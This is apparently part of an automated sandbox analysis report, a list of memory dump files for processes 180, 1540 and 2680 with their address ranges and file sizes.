                                                                    • memory/180-76-0x00007FF8F7CB0000-0x00007FF8F7CD3000-memory.dmp
                                                                      Filesize

                                                                      140KB

                                                                    • memory/180-82-0x00007FF8E47D0000-0x00007FF8E48EC000-memory.dmp
                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/180-77-0x00007FF8EAB20000-0x00007FF8EAB34000-memory.dmp
                                                                      Filesize

                                                                      80KB

                                                                    • memory/180-78-0x00007FF8F3FA0000-0x00007FF8F3FAD000-memory.dmp
                                                                      Filesize

                                                                      52KB

                                                                    • memory/180-72-0x00007FF8E3820000-0x00007FF8E3D42000-memory.dmp
                                                                      Filesize

                                                                      5.1MB

                                                                    • memory/180-73-0x000002A8FAD30000-0x000002A8FB252000-memory.dmp
                                                                      Filesize

                                                                      5.1MB

                                                                    • memory/180-69-0x00007FF8E3D50000-0x00007FF8E3E1D000-memory.dmp
                                                                      Filesize

                                                                      820KB

                                                                    • memory/180-68-0x00007FF8E49B0000-0x00007FF8E4F99000-memory.dmp
                                                                      Filesize

                                                                      5.9MB

                                                                    • memory/180-66-0x00007FF8EAB40000-0x00007FF8EAB73000-memory.dmp
                                                                      Filesize

                                                                      204KB

                                                                    • memory/180-57-0x00007FF8F3FE0000-0x00007FF8F3FF9000-memory.dmp
                                                                      Filesize

                                                                      100KB

                                                                    • memory/180-62-0x00007FF8F3860000-0x00007FF8F3879000-memory.dmp
                                                                      Filesize

                                                                      100KB

                                                                    • memory/180-312-0x00007FF8E49B0000-0x00007FF8E4F99000-memory.dmp
                                                                      Filesize

                                                                      5.9MB

                                                                    • memory/180-323-0x00007FF8E3820000-0x00007FF8E3D42000-memory.dmp
                                                                      Filesize

                                                                      5.1MB

                                                                    • memory/180-327-0x00007FF8EAB40000-0x00007FF8EAB73000-memory.dmp
                                                                      Filesize

                                                                      204KB

                                                                    • memory/180-322-0x00007FF8E3D50000-0x00007FF8E3E1D000-memory.dmp
                                                                      Filesize

                                                                      820KB

                                                                    • memory/180-60-0x00007FF8E4580000-0x00007FF8E46F7000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/180-313-0x00007FF8F7CB0000-0x00007FF8F7CD3000-memory.dmp
                                                                      Filesize

                                                                      140KB

                                                                    • memory/180-328-0x000002A8FAD30000-0x000002A8FB252000-memory.dmp
                                                                      Filesize

                                                                      5.1MB

                                                                    • memory/180-350-0x00007FF8E4580000-0x00007FF8E46F7000-memory.dmp
                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/180-361-0x00007FF8E49B0000-0x00007FF8E4F99000-memory.dmp
                                                                      Filesize

                                                                      5.9MB

                                                                    • memory/180-364-0x00007FF8F3FB0000-0x00007FF8F3FD3000-memory.dmp
                                                                      Filesize

                                                                      140KB

                                                                    • memory/180-363-0x00007FF8F3FE0000-0x00007FF8F3FF9000-memory.dmp
                                                                      Filesize

                                                                      100KB

                                                                    • memory/180-362-0x00007FF8F42C0000-0x00007FF8F42ED000-memory.dmp
                                                                      Filesize

                                                                      180KB

                                                                    • memory/180-360-0x00007FF8F7CB0000-0x00007FF8F7CD3000-memory.dmp
                                                                      Filesize

                                                                      140KB

                                                                    • memory/180-359-0x00007FF8FAAE0000-0x00007FF8FAAEF000-memory.dmp
                                                                      Filesize

                                                                      60KB

                                                                    • memory/180-358-0x00007FF8E47D0000-0x00007FF8E48EC000-memory.dmp
                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/180-357-0x00007FF8F3FA0000-0x00007FF8F3FAD000-memory.dmp
                                                                      Filesize

                                                                      52KB

                                                                    • memory/1540-83-0x00007FF8E2CF3000-0x00007FF8E2CF5000-memory.dmp
                                                                      Filesize

                                                                      8KB

                                                                    • memory/1540-85-0x00007FF8E2CF0000-0x00007FF8E37B1000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/1540-87-0x00007FF8E2CF0000-0x00007FF8E37B1000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/1540-97-0x000001F4788D0000-0x000001F4788F2000-memory.dmp
                                                                      Filesize

                                                                      136KB

                                                                    • memory/1540-192-0x00007FF8E2CF0000-0x00007FF8E37B1000-memory.dmp
                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/2680-252-0x0000014AF8CC0000-0x0000014AF8CC8000-memory.dmp
                                                                      Filesize

                                                                      32KB